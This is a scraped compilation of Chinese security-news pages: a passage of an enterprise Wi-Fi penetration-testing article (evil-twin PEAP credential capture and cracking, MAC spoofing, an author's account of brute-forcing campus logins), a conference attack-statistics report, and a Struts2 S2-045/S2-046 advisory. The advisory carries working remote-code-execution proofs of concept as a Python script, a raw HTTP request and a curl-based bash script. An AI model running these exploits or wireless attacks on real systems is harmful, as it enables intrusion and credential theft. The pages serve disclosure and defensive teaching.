
这就导致一些问题:

未认证的证书显示效果都是相似的,所以任何人都可伪造出显示效果类似的钓鱼热点;
用户对于“是否信任”等对话框会习惯性点击接受;
许多客户端(Android)不对服务端证书验证。

攻击PEAP热点
针对采用此类不安全配置的PEAP网络,攻击流程如下:

1. 建立伪造热点和RADIUS服务器。

2. 在客户端与伪造热点连接并建立TLS隧道后,记录用户与伪造Radius服务器认证交互时传递的凭证信息(Challenge/Response)。

3. 通过字典攻击破解密码。

其中第1,2步可使用hostapd-wpe工具,其通过为hostapd提供补丁程序的形式使其支持对 PEAP/MSCHAPv2、EAP-TTLS/MSCHAPv2等认证类型的攻击。在最新的Kali Linux系统软件仓库中可以通过命令“`apt install hostapd-wpe“`自动安装并配置证书等。默认的网络配置文件为“`/etc/hostapd-wpe/hostapd-wpe.conf“`,可以在该文件中修改网络接口、网络名称、信道、证书文件目录等,如下图所示:

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/81701388.png

我们可以自定义证书信息,修改certs目录中ca.cnf,server.cnf,client.cnf三个文件的以下字段:

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/81742778.png

并生成新的证书文件:

cd /etc/hostapd-wpe/certs

rm -f *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt* //删除原有证书文件

make clean

./bootstrap

make install
证书生成完成后,通过命令hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf即可建立该钓鱼网络。我们通过终端对该热点进行连接,可以看到的证书信息如下图所示:

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/81783598.png

一旦信任证书并输入账号密码后,便能在控制台观察到被记录的hash值(Challenge/Response),日志同时也会保存在hostapd-wpe.log文件中。

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/81888252.png

接下来我们需要对获取到的hash进行破解运算,可以使用Asleap、John the Ripper、hashcat等工具。在hostapd-wpe的日志中同时生成了NETNTLM格式的hash,该格式可以直接被John the Ripper和hashcat使用。这里以asleap工具为例:

asleap -C Challenge值 -R Response值 -W 字典文件
破解成功后效果如下图所示:

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/81920321.png

通过上述方法,我们利用虚假热点获取用户传输的凭证Hash,在破解成功后即可利用用户凭证进入网络。

3. Captive Portal热点
Captive Portal认证通常也称为WEB认证,其经常部署在大型的公共无线网络或企业无线网络中,如商店、机场、会议、银行等等。当未认证用户连接时,会强制用户跳转到指定页面,具体的实施方式不止一种,例如HTTP 重定向、ICMP 重定向、DNS 重定向等。

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/82122614.png

Captive Portal认证通常被部署于开放式网络中,往往会存在几个攻击点:

3.1 被动窃听
在开放式网络中,802.11数据帧在传输时未对上层数据进行加密,这意味着采用空口抓包的方式即可发现所有无线客户端与该热点交互的明文数据流。比如用户访问网站时产生的HTTP数据等,其中具体内容可被黑客直接通过被动嗅探的方式得到,如下图:

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/82336364.png

在2018年6月5日,Wi-Fi 联盟推出了Wi-Fi CERTIFIED Enhanced Open(增强型开放式网络)。其针对被动窃听攻击,对开放式网络提供了保护。Wi-Fi Enhanced Open基于OWE(Opportunistic Wireless Encryption),为每位用户提供单独的加密方式,以保证设备与Wi-Fi接入点之间的网络信道安全。

Wi-Fi Enhanced Open 采用过渡式的模式部署,以在不干扰用户或运营商情况下,逐步从开放式网络迁移到Wi-Fi Enhanced Open网络。不过这也意味着在Enhanced Open被广泛应用前,绝大部分的无线设备依旧会受该缺陷的影响。

3.2 攻击Captive Portal服务器
前面提到,Captive Portal实际上是一个Web认证,这实际上就引入了Web方面的安全威胁。

笔者大学期间,校园无线网络便使用了Portal认证,该认证系统默认使用了学号同时作为用户名及初始密码。于是笔者通过爆破攻击(Bruce force)的方式,在Portal登录页面对全校所有学生学号进行了尝试,通过页面返回长度来判断是否登录成功,最后笔者得到了数千个有效的上网账号。这便是利用了Web应用的弱密码缺陷及无防暴力破解缺陷而实施的一种组合攻击。

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/83830771.png

处于内网的应用系统往往还具有一个特点,它们往往使用着较老版本的系统,比如我们发现许多的企业的Portal服务使用了Struts2框架进行构建,而该框架曾经被爆出过大量的远程代码执行漏洞,导致我们往往能通过现成的利用工具进行远程代码执行。

3.3 伪造MAC地址绕过认证
Captive Portal认证基于MAC地址来区分不同客户端,这意味着伪造成已通过认证客户端的MAC地址就能绕过认证。

macchanger -m xx:xx:xx:xx:xx:xx wlan0
3.4 钓鱼热点
无线客户端会尝试自动重连相同名称相同加密方式的热点,比如当你从回家时你的手机会自动连上家里的Wi-Fi而不用再手动输入密码进行连接。而如果你之前连接过一个无密码的开放式热点,攻击者就只需要将名称设为相同就能满足条件,并吸引你的无线设备自动连入钓鱼热点了。

通过钓鱼热点获取用户敏感信息的文章网上已有很多,这里不再赘述。除了使用hostpad配合dnsmasq来搭建钓鱼热点外,也可以使用Wifiphisher等工具来一键建立。

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/82883711.png

3.5 ACL配置错误
在我们做渗透测试时发现一些网络存在ACL配置错误的情况。虽然没有通过认证无法访问互联网资源,但是内网的资源都可以直接访问,对于渗透测试者来说,不能访问互联网没有关系,只要可以访问内网资源就可以了。

4. 私建热点
在Wi-Fi技术流行以前,企业内网中的电脑都是通过有线方式进行连接的,企业网络的拓扑结构和网络边界通常也是固定的。但是,自从Wi-Fi技术普及以来,企业的内网边界正在变得越来越模糊。特别是私搭乱建的Wi-Fi网络,给企业的内网安全造成了极大的隐患。为了减少网络数据费用,企业员工更倾向于将他们的无线设备连入企业网络。如果企业并未提供这样满足上网需求的热点,员工往往会尝试通过私接路由器或者利用USB无线网卡的方式来建立无线热点。

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/83500093.png
在大多数企业中,私建热点已成了一种普遍现象。这些私建的Wi-Fi网络实际上是在已得到准入授权的设备上开放了一个新的入口,使得未经授权的设备可以通过这个入口不受限制的接入内网系统,而且管理员很难发现。同时它们往往都没采用安全的加密模式及高强度的密码,极易遭到黑客攻击。其中较著名的一次事件,2015年,一个初中生通过一个开放式热点网络连入了企业内网,通过ssh弱口令登陆到了天河一号超级计算机的节点。

更糟的是,中国有许许多多的Wi-Fi密码分享应用,上面提供了大量共享的Wi-Fi热点可供用户连接。为什么会有这么多共享的热点呢,这是因为它们往往会诱导用户将用户自己的密码分享出去,比如安装时默认勾选自动分享Wi-Fi,一旦你使用这个软件连接自己的家庭Wi-Fi网络,你的密码就会被上传并公开。

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/83164041.png

但对于渗透测试人员而言,这无疑是一个密码宝库。在我们实际的渗透测试中,发现许多在政府部门、金融机构的内部热点都被分享到了这些密码共享平台,其中的大部分实际上就是员工的私建热点。由于这些热点具有办公网络的访问权限,利用它们就可以毫不费劲的访问到企业内部的敏感信息系统。

/var/folders/s2/3l7kbbsj0ds9tttznscgz7kr0000gn/T/WizNote/6fb18f09-c767-465c-b56b-5c95e33ef113/index_files/83554432.png

针对私建热点的攻击很简单,可混合采用以下方式:
1. 打开密码分享APP,在目标企业员工较多的楼层进行巡检,尝试发现可供连接的分享热点。若发现分享的热点,尝试连接并测试是否具有内网连接权限。

2. 通过airodump、kismet等工具扫描企业内部的无线热点,若发现WEP热点直接进行破解;若发现WPA热点收集握手包,并使用弱密码字典尝试破解。

5. 企业无线安全现状总结
无线安全的概念已经在国内兴起很多年了,但大部分企业的对于无线网络防护的落实还都处于刚起步阶段。根据我们天马安全团队这几年对外的无线渗透服务来看,存在的主要问题包括:

1. 传统安全防护无法应对无线威胁

国内安全市场对用户灌输的理念仍然是如何对有线网络进行防护加强,有线网络安全设备部署在网络出口,可以防范来自互联网的安全威胁,但由于无线网络提供服务的特殊性及有线网络防护技术的限制,应对来自无线的安全威胁时往往束手无策。用户无法了解无线网络空间中,有谁在使用无线网络?无线网络周围是否具有潜在威胁?有没有黑客入侵无线网络?这些问题,传统的有线网络安全手段均无法解决。

2. 无线安全风险高,攻击手段多样。

据Gartner调查显示,在众多网络安全威胁中,WLAN所面临的安全威胁处于最高风险等级,一个方面是由于目前对于网络安全的建设还只是停留在对有线网络的防护,无线网络还未纳入到基本的安全建设计划中,因此如何防范针对WLAN的攻击,还没有形成有效的共识。另一方面,黑客不断寻找有漏洞的边界,一旦发现没有防护的边界,便可轻松突破并带来严重后果。因此攻与防的不对等态势导致无线网络变成安全风险最高的网络领域。

3. 关于无线网络的安全建设存在误区。

当前部分企业和政府机关为提高办公效率都已建设或拟建设无线网路作为已有办公方式的重要补充,但是配套的无线网络安全建设却被忽视。不论是未部署无线的企业,还是已部署无线的企业,其实都存在数据泄漏的风险,例如“我们没有部署无线,风险与我们没关系”、“我们的无线已经足够安全”、“我们的手机安装有安全软件”等想法都是与当前无线安全威胁所造成的事实不相符的。

实际上,针对企业无线网络存在的这些安全问题,我们在14年就孵化了一款针对企业无线环境的无线入侵防御系统——360天巡。(为避免广告嫌疑,这里不再详述,感兴趣读者可以通过外链查看)

通过本文,希望大家可以了解到企业无线网络的常见脆弱点,企业安全管理人员也可以针对这些脆弱点加强保护,减少由无线网络导致的企业入侵事件。

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/158717
安全客 – 有思想的安全新媒体
无线安全 企业安全

360天马安全团队 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
Helen
换一个
|评论列表
越南邻国宰相 · 2018-09-08 12:30:17 回复
写的很全面,不错

教主 · 2018-09-03 17:23:45 回复
厉害厉害

荒 · 2018-09-03 17:08:53 回复
大佬是怎么学的 这么强

360天马安全团队
360PegasusTeam 研究最前沿的攻防对抗技术
文章
14
粉丝
2
TA的文章
有VPN保护就可以随意连接公共热点?大错特错
2019-01-21 11:57:42
开启Wi-Fi就会泄漏身份信息,还有这种骚操作?
2018-10-15 14:33:52
一二三四五,企业无线渗透说清楚
2018-09-03 15:29:13
初探WPA3中的Wi-Fi Easy Connect
2018-07-04 14:00:58
DEFCON CHINA议题解读 | SmartCfg无线配网方案安全分析
2018-05-14 11:00:58
输入关键字搜索内容
相关文章
1月政企终端安全态势分析报告
利用Marvell Avastar Wi-Fi中的漏洞远程控制设备:从零知识入门到RCE漏洞挖掘利用(下)
利用Marvell Avastar Wi-Fi中的漏洞远程控制设备:从零知识入门到RCE漏洞挖掘利用(上)
有VPN保护就可以随意连接公共热点?大错特错
独角兽暑期训练营 | 无人机广播信号盲分析
低功耗蓝牙攻击实用指南
BLE安全初探之HACKMELOCK
热门推荐
文章目录
1.企业无线安全概述
企业无线热点类型
2. 802.1X热点
攻击PEAP热点
3. Captive Portal热点
3.1 被动窃听
3.2 攻击Captive Portal服务器
3.3 伪造MAC地址绕过认证
3.4 钓鱼热点
3.5 ACL配置错误
4. 私建热点
5. 企业无线安全现状总结
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

恒会网

恒会网
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
安恒会议网络安保安全态势数据浅谈
阅读量 80070 | 评论 1

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2018-11-29 16:45:16

引:风暴中心将会陆续在安全客平台,发布各类专题技术报告、年度安全报告及最新技术研究,欢迎各位关注我们,参与交流和讨论。

本次我们用数据说话,依据安恒十一月先后参加的中国国际进口博览会、第五届世界互联网大会以及联合国世界地理信息大会这三大国际型会议的安全态势报告,带大家走进安恒技术!安恒提供专业、稳定的云防护服务,网站所有攻击均被有效阻断,未造成攻击成功或篡改成功的安全事件,有效地保障网站安全、平稳地运行。

中国国际进口博览会
2018-10-23至2018-11-11, 玄武盾参与防护上海区域网站群共计受到攻击448.27万次。

以下是部分攻击趋势图:

注:深红色段为进博会举办期间攻击趋势

根据风暴中心拦截攻击趋势分析,会议期间的攻击数据保持较高的态势,而在活动前的预热阶段与活动闭幕后的余热阶段,每日攻击态势依旧不容乐观。如图,攻击时间段趋势如下:

根据时间段攻击趋势分析,白天的攻击量明显高于夜晚,且白天的攻击量与活动举办的时间段有关,如9:00-11:00,13:00-17:00这两阶段的攻击数据明显高于其他时间段。17:00-23:00,攻击态势依旧保持较高的状态,介于15万-20万之间,而在凌晨的0:00-8:00,攻击态势处于全天中的低谷阶段。

与此同时,根据风暴中心数据大脑安全分析,境外攻击源主要是通过肉鸡、跳板机对网站发起恶意攻击,具体攻击区域分布见下图:

此间,网站群累计遭受515个IP的扫描攻击,封锁次数为11,632次,玄武盾识别到扫描行为后立即封锁IP,未对网站造成影响。

第五届世界互联网大会
2018-11-01至2018-11-10,玄武盾对省重点网站开展远程安全扫描监测,根据后台统计数据显示,期间监测防护站点累计遭受866.99万次攻击。

注:深红色段为世界互联网大会举办期间攻击趋势

上图是11月1日-10日重点网站所受到的攻击趋势图,可以看出:会议筹备前夕,网络攻击趋势比较平稳,平均保持在50万次/天;在世界互联网大会开幕的前一天,攻击量开始攀升,达到112.71万次,同比增长约2倍。

而在世界互联网大会举办期间,网络攻击数量大增,攻防对抗激烈,攻击态势整体保持在170万次左右。大会闭幕期间,相比会议期间,网络攻击的数据下降,但总体攻击依旧较高,平均处于65万次/天,依旧高于前期会议筹备阶段的攻击数量。

由此可见,在大型国际会议或活动时期,网络空间的安全威胁不容小觑,网络攻击流量巨大,网络攻防势力对抗激烈。

值守全天总体态势分析:攻击数据最高时段集中在10:00—12:00,14:00—17:00,18:00—20:00;攻击低时段处于凌晨2:00—7:00,该时段的攻击数量均处于30万以下;其中,12:00,13:00,17:00,这三个节点明显出现洼地现象。

趋势解析:全天候时间段攻击数量的多少,与大会召开的时间段相关,也与网络攻击者的生活习性有关。

期间Web攻击类型以SQL注入攻击、命令注入攻击、漏洞防护等居多,主要攻击类型分布如图:

根据风暴中心数据大脑安全分析,境外攻击源主要是通过肉鸡、跳板机对网站发起恶意攻击,具体攻击区域分布见下图:

联合国世界地理信息大会
2018-11-18至2018-11-23,玄武盾省重点网站开展远程安全扫描监测,根据后台统计数据显示,期间监测防护网站群共计遭受1817.29万次攻击。以下是部分时间段网站群安全态势:

注:深红色段为联合国世界地理信息大会举办期间攻击趋势

本届联合国世界地理信息大会的网络攻击趋势严峻,从11月18-23日,网络攻击态势一直居高不下,平均保持在300万/天,网络空间的安全保障攻坚战异常艰巨。

安恒信息安保小组实行7×24小时全天候的安全值守,制定周密的应急响应机制,结合机器学习技术、网络攻防技术、威胁情报技术与人工经验分析,积极打击网络攻击势头,确保防护站点的安全性。攻击时间段趋势如下:

从时间分布上看,9:00-11:00,14:00-17:00,23:00-凌晨1:00,是网络安全攻防的高峰期;凌晨2:00-8:00,网络攻击相对较为平缓,保持在65万/小时左右。

本次时间分布趋势图比较独特的地方在于:午夜时间段,网络攻击态势处于猛烈状态,22:00-23:00的攻击量超过100万次,与白天攻击态势最高峰的数据量几乎持平。

扫描攻击详情:累计遭受1,014个IP的扫描攻击,封锁次数为43,885次,玄武盾识别到扫描行为后立即封锁IP,未对网站造成影响。

根据风暴中心数据大脑安全分析,境外攻击源主要是通过肉鸡、跳板机对网站发起恶意攻击,具体攻击区域分布见下图:

安全建议
从以上三次大型安全保重事件中得出经验,风暴中心建议网络运营方应该多关注攻击者常用的攻击类型,查漏补缺,定期对网络资产进行风险扫描与分析,及时修补漏洞;重视代码审计与渗透测试技术的重要性,有效管理网络资产安全;同时,注重安全能力的提升,完善安全机制。

♣ 加固网站服务器安全

加强网站服务器的日常维护,做好网站服务器的访问控制,限定开放访问IP白名单,限定开放高危端口/服务,定期对网站服务器进行安全体检,及时消除可能存在的安全隐患。

♣ 加强网站弱点修复

定期对网站开展安全风险评估,进行风险扫描与分析,及时消除网站的漏洞风险,提升网站本身的安全性。

♣ 及时清理网页后门

网站发布、升级、迁移前和日常运维过程中,都要对网站源文件进行网页后门扫描和彻底清理。

♣ 加强管理账号管理

加强对网站管理后台账号、FTP/SSH/VNC/远程桌面等远程维护工具账号的管理,尽量使用强密码,并定期更新密码。

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/166900
安全客 – 有思想的安全新媒体
安全报告 安全态势 攻击数据

安恒风暴中心 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
越南邻国宰相
换一个
|评论列表
昵称最多只能10个字 · 2018-12-01 11:16:27 回复
现在恶意攻击网站的还是挺多的,不过好多都是一些菜鸡用工具扫描字典,也是真的够闲的

安恒风暴中心
全球网安500强,安恒助力安全中国
文章
4
粉丝
3
TA的文章
安恒会议网络安保安全态势数据浅谈
2018-11-29 16:45:16
实锤案分享 攻防骚对抗 | 黑产挖矿的路子居然这么野了?
2018-11-27 16:30:40
Linux系统在互联网中面临的安全威胁分析报告
2018-11-06 15:30:38
2018年度 上半年暗链监测分析报告
2018-09-23 10:00:54
输入关键字搜索内容
相关文章
1月政企终端安全态势分析报告
知道创宇404实验室2018年网络空间安全报告
2018年全球十大APT攻击事件盘点
Android Native病毒——2018年度研究报告
2018中国白帽人才调查报告
开源软件代码安全缺陷分析报告——物联网软件专题
移动平台新型诈骗解析
热门推荐
文章目录
中国国际进口博览会
第五届世界互联网大会
联合国世界地理信息大会
安全建议
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

s2-045

s2-045
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
【重大漏洞预警】Struts 2 远程代码执行漏洞(s2-045s2-046) (含PoC)
阅读量 275446 |

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
发布时间:2017-03-21 09:58:06
http://p6.qhimg.com/t012e9f69bc74def9ff.png

背景介绍

近日,安全研究人员发现著名J2EE框架——Struts2存在远程代码执行的漏洞,Struts2官方已经确认该漏洞(S2-045,S2-046),并定级为高危漏洞。

Struts2 的使用范围及其广泛,国内外均有大量厂商使用该框架。

Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。(来源:百度百科)

漏洞描述

使用Jakarta插件处理文件上传操作时可能导致远程代码执行漏洞。

http://p9.qhimg.com/t0180d967ced28d63f5.png

S2-045漏洞影响

攻击者可以通过构造HTTP请求头中的Content-Type值可能造成远程代码执行。

S2-045PoC_1(来源于网络:http://www.cnblogs.com/milantgh/p/6512739.html )

#! /usr/bin/env python
# encoding:utf-8
import urllib2
import sys
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers
def poc():
register_openers()
datagen, header = multipart_encode({“image1”: open(“tmp.txt”, “rb”)})
header[“User-Agent”]=”Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36″
header[“Content-Type”]=”%{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=’ifconfig’).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}”
request = urllib2.Request(str(sys.argv[1]),datagen,headers=header)
response = urllib2.urlopen(request)
print response.read()
poc()

S2-046漏洞影响(更新)

触发条件

上传文件的大小(由Content-Length头指定)大于Struts2默认允许的最大大小(2M)。

header中的Content-Disposition中包含空字节。

文件名内容构造恶意的OGNL内容。

S2-046PoC(来源于网络:https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723# )

需要在strust.xml中加入 才能触发。

POST /doUpload.action HTTP/1.1
Host: localhost:8080
Content-Length: 10000000
Content-Type: multipart/form-data; boundary=—-WebKitFormBoundaryAnmUgTEhFhOZpr9z
Connection: close

——WebKitFormBoundaryAnmUgTEhFhOZpr9z
Content-Disposition: form-data; name=”upload”; filename=”%{#context[‘com.opensymphony.xwork2.dispatcher.HttpServletResponse’].addHeader(‘X-Test’,’Kaboom’)}”
Content-Type: text/plain
Kaboom

——WebKitFormBoundaryAnmUgTEhFhOZpr9z–

S2-046PoC_2(来源于网络:https://gist.githubusercontent.com/frohoff/a3e24764561c0c18b6270805140e7600 )

#!/bin/bash

url=$1
cmd=$2
shift
shift

boundary=”—————————735323031399963166993862150″
content_type=”multipart/form-data; boundary=$boundary”
payload=$(echo “%{(#nike=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='”$cmd”‘).(#iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(#cmds=(#iswin?{‘cmd.exe’,’/c’,#cmd}:{‘/bin/bash’,’-c’,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}”)

printf — “–$boundaryrnContent-Disposition: form-data; name=”foo”; filename=”%sb”rnContent-Type: text/plainrnrnxrn–$boundary–rnrn” “$payload” | curl “$url” -H “Content-Type: $content_type” -H “Expect: ” -H “Connection: close” –data-binary @- $@
验证截图

https://p2.ssl.qhimg.com/t01203e6ee0e6688c16.png

修复建议

1. 严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。

2. 如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.32或2.5.10.1版本。(强烈推荐)

官网公告

https://cwiki.apache.org/confluence/display/WW/S2-045

https://cwiki.apache.org/confluence/display/WW/S2-046

补丁地址

Struts 2.3.32:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32

Struts 2.5.10.1:https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1

参考

http://struts.apache.org/docs/s2-045.html

http://struts.apache.org/docs/s2-046.html

https://gist.githubusercontent.com/frohoff/a3e24764561c0c18b6270805140e7600

https://community.hpe.com/t5/Security-Research/Struts2-046-A-new-vector/ba-p/6949723#

本文由安全客原创发布
转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/85744
安全客 – 有思想的安全新媒体
安全知识

安全客 官方小编 分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读

ARM汇编之堆栈溢出实战分析四(GDB)
2019-02-19 16:00:28

盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
2019-02-19 14:33:15

从两道CTF实例看python格式化字符串漏洞
2019-02-19 14:30:48

Typora XSS 到 RCE(下)
2019-02-19 11:30:28
|发表评论
发表你的评论吧
昵称
Dir溢出大神
换一个
|评论列表
还没有评论呢,快去抢个沙发吧~
安全客
有思想的安全新媒体
文章
1132
粉丝
51
TA的文章
256万人脸识别数据遭泄露,“脸”还安全吗?
2019-02-15 19:22:33
日政府授权入侵公民物联网设备
2019-02-01 13:49:08
360网络安全周报第195期
2019-01-25 18:18:17
拼多多:关于“黑灰产通过平台优惠券漏洞不正当牟利”的声明
2019-01-20 14:18:46
360网络安全周报第193期
2019-01-13 11:07:25
输入关键字搜索内容
相关文章
360 | 数字货币钱包APP安全威胁概况
以太坊智能合约安全入门了解一下(下)
对恶意勒索软件Samsam多个变种的深入分析
360 | 数字货币钱包安全白皮书
Json Web Token历险记
揪出底层的幽灵:深挖寄生灵Ⅱ
简单五步教你如何绕过安全狗
热门推荐
安全客Logo
安全客
安全客
关于我们
加入我们
联系我们
用户协议
商务合作
合作内容
联系方式
友情链接
内容须知
投稿须知
转载须知
合作单位
安全客
安全客
Copyright © 360网络攻防实验室 All Rights Reserved 京ICP备08010314号-66
Loading…0daybank

安全网站

安全网站
首页
文章

漏洞
SRC导航
内容精选

输入关键词搜索

APP 登录| 注册
众测|饿了么合作伙伴众测活动第一期开启!活动
挖洞天使降临!MiSRC双倍金币活动开启!活动
|Nexus Repository Manager 3 远程代码执行漏洞 (CVE-2019-7238) 分析及利用
Previous
Next
最新文章
知识
资讯
招聘
活动
安全周报

SRC
众测|饿了么合作伙伴众测活动第一期开启!
SRC 众测 饿了么 白帽子活动
生态合作伙伴是饿了么的重要一环,他们的安全性与饿了么广大用户的安全性息息相关,我们正在积极与生态合作伙伴一起改善互联网安全生态环境。本次活动主要为改善饿了么服务商合作伙伴的互联网安全生态环境。
安全客 饿了么安全应急响应中心 2019-02-19 16:05:11 1974次阅读
缓冲区溢出
ARM汇编之堆栈溢出实战分析四(GDB)
缓冲区溢出 arm
这是最后一个实例stack6的分析实战过程,中间跳过了两个例子,他们的解决思路在前面每个例子的尾部EXP的构造、实现中已经得到了体现,就不再写一些重复的内容,今天主要带来的是几个新技巧:ret2zp,通过这两中技术来绕过栈保护机制。
安全客 勤学奋进小郎君 2019-02-19 16:00:28 稿费: + 600 2819次阅读
威胁情报
盲眼鹰(APT-C-36):持续针对哥伦比亚政企机构的攻击活动揭露
威胁情报 APT 恶意活动
从2018年4月起至今,一个疑似来自南美洲的APT组织盲眼鹰(APT-C-36)针对哥伦比亚政府机构和大型公司(金融、石油、制造等行业)等重要领域展开了有组织、有计划、针对性的长期不间断攻击。
安全客 360威胁情报中心 2019-02-19 14:33:15 5639次阅读 4
Python
从两道CTF实例看python格式化字符串漏洞
Python Web安全 代码安全
pyhton中,存在几种格式化字符串的方式,然而当我们使用的方式不正确的时候,即格式化的字符串能够被我们控制时,就会导致一些严重的问题,比如获取敏感信息
安全客 Hu3sky 2019-02-19 14:30:48 稿费: + 600 6245次阅读
xss
Typora XSS 到 RCE(下)
xss Web安全 RCE Typora
上一篇文章讲了我通过黑盒测试从输出点入手挖到的 Typora 可以导致远程命令执行的XSS,并分析了漏洞原因。那么今天就讲一下我从代码入手挖到的另外两个XSS。
安全客 Li4n0 2019-02-19 11:30:28 稿费: + 600 10462次阅读
网络安全
分析TLS 1.3降级攻击以及主要TLS库中的漏洞
网络安全 TLS
我们披露了几个TLS库中发现的漏洞,我们的攻击方式是针对这些实现的缓存访问时序利用侧信道泄漏,从而攻破TLS实现的RSA密钥交换。在本文中,我将主要讨论协议级别的漏洞利用。
安全客 P!chu 2019-02-19 10:30:36 稿费: + 200 9518次阅读
安全资讯
2月19日每日安全热点 – APT-C-36: 针对哥伦比亚政府机构和公司的持续攻击
安全资讯 安全热点 网络安全热点 每日安全热点
APT-C-36: 针对哥伦比亚政府机构和公司的持续攻击;如何攻击目标Facebook账户?让它打开个链接就行了;Malcom:一款功能强大的图形化恶意软件通信分析工具;拒绝超长函数,从两个 curl 远程漏洞说起。
安全客 360CERT 2019-02-19 09:45:56 9679次阅读
漏洞分析
【缺陷周话】第22期:错误的内存释放对象
漏洞分析 代码审计 代码安全
